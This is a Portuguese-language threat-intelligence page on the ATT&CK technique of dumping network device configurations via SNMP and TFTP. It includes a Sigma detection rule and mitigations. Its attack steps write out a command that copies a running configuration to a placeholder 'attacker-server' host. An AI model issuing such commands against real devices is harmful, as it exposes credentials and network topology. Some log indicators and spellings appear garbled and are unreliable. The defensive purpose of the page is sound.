# T1602 - Data from Configuration Repository ## Descrição **Data from Configuration Repository** descreve a coleta de dados a partir de repositórios de configuração de dispositivos de rede - como roteadores, switches, firewalls e controladores sem fio. Esses repositórios contêm configurações que permitem ao adversário mapear completamente a infraestrutura de rede, identificar credenciais de acesso, descobrir segmentações e planejar movimentos laterais ou sabotagem. No contexto brasileiro e latino-americano, essa técnica é particularmente relevante para ataques a infraestrutura crítica - redes de telecomúnicações, energia elétrica, água e sistemas financeiros. O Brasil possui um dos maiores parques de equipamentos Cisco e Juniper da América Latina, e repositórios de configuração mal protegidos representam um vetor de comprometimento frequentemente subestimado. A técnica engloba dois vetores principais, representados pelas sub-técnicas: - **[[t1602-001-snmp-mib-dump|T1602.001 - SNMP (MIB Dump)]]**: Uso do protocolo SNMP (versões 1 e 2c, que usam community strings fracas como `public` ou `private`) para consultar a MIB (Management Information Base) de dispositivos, extraindo topologia de rede, interfaces, rotas e configurações de sistema. - **[[t1602-002-network-device-configuration-dump|T1602.002 - Network Device Configuration Dump]]**: Acesso direto às configurações de dispositivos via protocolos de gerenciamento (TFTP, SCP, FTP, NETCONF) ou exploração de vulnerabilidades em software de gerenciamento de rede (NMS) como SolarWinds, PRTG ou Cisco DNA Center. Dados obtidos de repositórios de configuração são altamente valiosos para planejamento de ataques subsequentes: credenciais de enable/secret, ACLs, VLANs, túneis VPN, políticas de QoS e topologia completa da rede interna. Esse nível de detalhe normalmente requereria semanas de reconhecimento ativo - tornando T1602 uma das técnicas de maior impacto estratégico disponíveis a adversários com acesso à rede. --- ## Attack Flow ```mermaid graph TB A([Acesso à Rede<br/>T1190 / VPN]) --> B[Reconhecimento<br/>de Dispositivos<br/>T1046] B --> C{Vetor} C --> D[SNMP Community<br/>String Fraca<br/>T1602.001] C --> E[Acesso NMS /<br/>Credenciais<br/>T1602.002] D --> F:::highlight[T1602<br/>Dump de<br/>Configuração] E --> F F --> G[Mapa da Rede<br/>Credenciais<br/>ACLs / VLANs] G --> H[Movimento<br/>Lateral<br/>T1021] G --> I([Sabotagem /<br/>Exfiltração]) classDef highlight fill:#e74c3c,color:#fff ``` --- ## Como Funciona **Passo 1 - Descoberta de dispositivos e protocolos de gerenciamento** O adversário, com acesso à rede interna (via VPN comprometida, [[t1190-exploit-public-facing-application|exploit de aplicação pública]] ou [[t1078-valid-accounts|credenciais válidas]]), realiza varredura por dispositivos de rede respondendo a SNMP (porta UDP 161/162), NETCONF (830), TFTP (69) e protocolos de gerenciamento proprietários. Ferramentas como `nmap`, `snmpwalk` e `onesixtyone` são usadas para enumeração inicial. Em redes de telecomúnicações brasileiras, é comum encontrar equipamentos com comunidade SNMP `public` habilitada por padrão. **Passo 2 - Extração de configurações via SNMP ou protocolo de gerenciamento** Via SNMP v1/v2c, o adversário executa `snmpwalk` ou `snmpget` para extrair OIDs relevantes da MIB-II, incluindo `sysDescr`, `ifTable` (interfaces), `ipRouteTable` (rotas) e configurações específicas do vendor. Para T1602.002, o adversário usa credenciais obtidas via [[t1552-unsecured-credentials|T1552]] ou acesso ao NMS para disparar um `copy running-config tftp://attacker-server/config.txt` no dispositivo, obtendo a configuração completa em texto claro. **Passo 3 - Análise e weaponização das configurações** As configurações extraídas são analisadas offline. O adversário identifica: senhas de enable em formato MD5 ou Type 7 (facilmente quebráveis), credenciais de usuário local, configurações de BGP com vizinhos e senhas MD5, ACLs que revelam segmentação e políticas de segurança, interfaces de gerenciamento e endereços IP internos. Com esse mapa, o adversário planejá movimento lateral, elevação de privilégio de rede ou sabotagem de roteamento via [[t1602-002-network-device-configuration-dump|T1602.002]]. --- ## Detecção ### Event IDs e Fontes de Log Relevantes | Plataforma | Fonte | Indicador | |------------|-------|-----------| | Dispositivos Cisco/Juniper | Syslog | `SNMP walk` de endereço IP não autorizado | | Dispositivos Cisco | Syslog | `%COPY-5-UPDOWN: Line protocol on Interface` - cópia de config via TFTP | | NMS (SolarWinds, PRTG) | Audit Log | Download de configuração fora de jánela de manutenção | | Firewall / IDS | NetFlow | Conexões UDP 161 de hosts não autorizados para múltiplos devices | | SNMP Trap Receiver | - | Múltiplas falhas de autenticação SNMP (`authenticationFailure` trap) | | Syslog Centralizado | - | `LINEPROTO-5-UPDOWN` em múltiplos dispositivos em curto período | ### Sigma Rule ```yaml title: SNMP Enumeration from Non-Management Host id: e9f1b432-3c5d-4a7e-8b22-d4c7e8f90123 status: experimental description: > Detecta tráfego SNMP originado de hosts fora da rede de gerenciamento autorizada, possível indicativo de coleta de dados de configuração (T1602.001) por adversário com acesso à rede interna. author: RunkIntel daté: 2026-03-24 references: - https://attack.mitre.org/techniques/T1602/001 logsource: category: firewall product: generic detection: selection: dst_port: - 161 - 162 proto: UDP filter_mgmt: src_ip|cidr: - '10.0.0.0/8' # Ajustar para a rede de gerenciamento real condition: selection and not filter_mgmt falsepositives: - Novos sistemas de monitoramento sendo integrados - Scanners de vulnerabilidade autorizados - Migração de plataforma NMS level: medium tags: - attack.collection - attack.t1602 - attack.t1602.001 ``` --- ## Mitigação | ID | Controle | Implementação para Organizações Brasileiras | |----|----------|---------------------------------------------| | [[m1051-update-software\|M1051 - Updaté Software]] | Manter firmware de dispositivos de rede atualizado; vulnerabilidades em NMS são vetores frequentes de T1602.002 | Priorizar patches de SolarWinds, Cisco DNA Center, PRTG - plataformas com histórico de CVEs críticos | | [[m1054-software-configuration\|M1054 - Software Configuration]] | Desabilitar SNMP v1/v2c; migrar para SNMPv3 com autenticação SHA e privacidade AES; alterar community strings padrão | Auditoria de comunidades SNMP em toda a infra - `public` e `private` devem ser bloqueadas imediatamente | | [[m1030-network-segmentation\|M1030 - Network Segmentation]] | Isolar tráfego de gerenciamento em VLAN dedicada (OOB management); restringir acesso SNMP/NETCONF a hosts NMS específicos | Implementar ACLs de gestão em todos os dispositivos: `snmp-server community X ro 99` com ACL restritiva | | [[m1037-filter-network-traffic\|M1037 - Filter Network Traffic]] | Bloquear acesso a portas de gerenciamento (22, 23, 161, 162, 443, 830) de segmentos não autorizados na borda interna | Aplicar firewall de segmento (micro-segmentação) entre zonas de usuários e dispositivos de rede | | [[m1031-network-intrusion-prevention\|M1031 - Network Intrusion Prevention]] | Implantar IPS com assinaturas para SNMP enumeration, TFTP config transfer e queries NETCONF anômalas | Cisco Stealthwatch ou equivalente para detecção de comportamento anômalo em protocolo de gerenciamento | | [[m1041-encrypt-sensitive-information\|M1041 - Encrypt Sensitive Information]] | Usar SNMPv3 com criptografia; habilitar `service password-encryption` em dispositivos Cisco; usar `secret` (MD5/SHA256) em vez de `password` | Revisar todos os dispositivos para `enable password` (Type 7) - converter para `enable secret` (Type 5/8/9) | --- ## Sub-técnicas - [[t1602-001-snmp-mib-dump|T1602.001 - SNMP (MIB Dump)]] - [[t1602-002-network-device-configuration-dump|T1602.002 - Network Device Configuration Dump]] ## Threat Actors que Usam Embora o MITRE ATT&CK não atribua grupos específicos à técnica-pai T1602 diretamente, as sub-técnicas são amplamente utilizadas por: - **APTs com foco em infraestrutura crítica** - grupos como [[g1017-volt-typhoon|Volt Typhoon]] (nexo China) documentadamente realizam SNMP enumeration e configuration dumps em infraestrutura de telecomúnicações e energia nos EUA, padrão replicável em operações contra o Brasil. - **Grupos de ransomware com foco em OT/ICS** - operadores de [[lockbit|LockBit]] e [[blackcat|ALPHV]] utilizam dumps de configuração de firewall e VPN para mapear redes antes da encriptação, técnica documentada em ataques a utilities brasileiras. - **Atores de espionagem patrocinados por Estado** - APTs com foco em telecomúnicações e energia utilizam SNMP MIB dumps para reconhecimento silencioso de longa duração sem disparar alertas de IDS tradicionais. --- *Fonte: [MITRE ATT&CK - T1602](https://attack.mitre.org/techniques/T1602)*